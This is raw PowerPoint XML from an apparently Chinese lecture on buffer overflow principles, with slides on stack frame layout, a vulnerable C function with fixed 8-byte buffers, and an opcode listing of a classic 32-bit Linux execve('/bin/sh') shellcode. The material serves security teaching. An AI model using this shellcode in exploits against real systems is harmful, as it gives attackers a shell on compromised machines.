            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>粗粒度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>安全服务少</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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2916D3F-5A34-43DD-8FAD-E8F1660E96C9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287746" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Shellcode Opcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287747" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="1981200"/>
            <a:ext cx="7543800" cy="3032125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>31 d2		xor    %edx,%edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>52			push   %edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>68 6e 2f 73 68	push   $0x68732f6e</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>68 2f 2f 62 69	push   $0x69622f2f</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>89 e3		mov    %esp,%ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>52			push   %edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>53			push   %ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>89 e1		mov    %esp,%ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>8d 42 0b		lea    0xb(%edx),%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>cd 80		int    $0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="287750" name="Picture 6"/>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1116013" y="4900613"/>
            <a:ext cx="7127875" cy="1624012"/>
          </a:xfrm>
          <a:noFill/>
          <a:extLs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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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5067588" y="6047606"/>
            <a:ext cx="510911" cy="450056"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="标题 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缓冲区溢出原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-36512"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lnSpcReduction="10000"/>
          </a:bodyPr>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dk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bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>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dk1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>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void fun(int);</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int main(void) {</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 </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fun(1);</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return 0;</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void  fun(int para) {</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char buffer_a[8];</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char buffer_b[8];</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    ……</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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>   return 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="109855" indent="0" fontAlgn="auto">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5074443" y="2466926"/>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buffer_a</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5074443" y="2971751"/>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EBP(main)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5074443" y="347498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16" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5074443" y="397981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18" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7007919" y="5045114"/>
            <a:ext cx="1308497"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EBP(m)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5074443" y="1628800"/>
            <a:ext cx="1588" cy="4439666"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6874643" y="1628800"/>
            <a:ext cx="0" cy="4439666"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076031" y="5492080"/>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24" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076031" y="1484784"/>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27" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076031" y="498879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29" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411760"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a:bodyPr>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3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="dk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800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>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dk1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>堆栈操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>压</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，压返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304"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anose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>压</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>基址指针值，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>同时将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>EBP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ESP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304"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anose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>压局部变量</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
